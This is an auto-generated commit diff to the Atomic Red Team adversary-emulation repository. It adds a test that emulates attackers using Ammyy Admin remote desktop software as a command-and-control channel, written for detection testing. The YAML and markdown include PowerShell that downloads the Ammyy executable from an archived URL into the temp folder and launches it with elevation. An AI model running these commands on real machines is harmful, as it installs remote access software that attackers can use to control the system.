Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-03-30 22:20:40 +00:00
parent d149f3346e
commit b23d5928a9
6 changed files with 89 additions and 0 deletions
@@ -1109,6 +1109,7 @@ command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test o
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
 command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
+command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
@@ -692,6 +692,7 @@ command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test o
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
 command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
+command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
@@ -1823,6 +1823,7 @@
  - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
  - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
  - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
+  - Atomic Test #6: Ammyy Admin Software Execution [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
  - Atomic Test #1: Base64 Encoded data. [macos, linux]
  - Atomic Test #2: XOR Encoded data. [windows]
@@ -1139,6 +1139,7 @@
  - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
  - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
  - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
+  - Atomic Test #6: Ammyy Admin Software Execution [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
  - Atomic Test #2: XOR Encoded data. [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -73403,6 +73403,39 @@ command-and-control:
          msiexec /x $installer /qn
        name: powershell
        elevation_required: true
+    - name: Ammyy Admin Software Execution
+      auto_generated_guid: 0ae9e327-3251-465a-a53b-485d4e3f58fa
+      description: "An adversary may attempt to trick the user into downloading Ammyy
+        Admin Remote Desktop Software for use as a C2 channel. \nUpon successful execution,
+        Ammyy Admin will be executed. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        Ammyy_Admin_Path:
+          description: Path of Ammyy Admin executable
+          type: Path
+          default: "$env:temp\\ammyy.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})
+
+'
+        prereq_command: 'if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Start-BitsTransfer -Source "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe"
+          -Destination "$env:temp\ammyy.exe" -dynamic
+
+'
+      executor:
+        command: 'Start-Process #{Ammyy_Admin_Path}
+
+'
+        cleanup_command: 'Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue
+
+'
+        name: powershell
+        elevation_required: true
  T1132.001:
    technique:
      external_references:
@@ -18,6 +18,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit

 - [Atomic Test #5 - ScreenConnect Application Download and Install on Windows](#atomic-test-5---screenconnect-application-download-and-install-on-windows)

+- [Atomic Test #6 - Ammyy Admin Software Execution](#atomic-test-6---ammyy-admin-software-execution)
+

 <br/>

@@ -198,4 +200,54 @@ msiexec /x $installer /qn



+<br/>
+<br/>
+
+## Atomic Test #6 - Ammyy Admin Software Execution
+An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel. 
+Upon successful execution, Ammyy Admin will be executed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0ae9e327-3251-465a-a53b-485d4e3f58fa
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| Ammyy_Admin_Path | Path of Ammyy Admin executable | Path | $env:temp&#92;ammyy.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Start-Process #{Ammyy_Admin_Path}
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -Destination "$env:temp\ammyy.exe" -dynamic
+```
+
+
+
+
 <br/>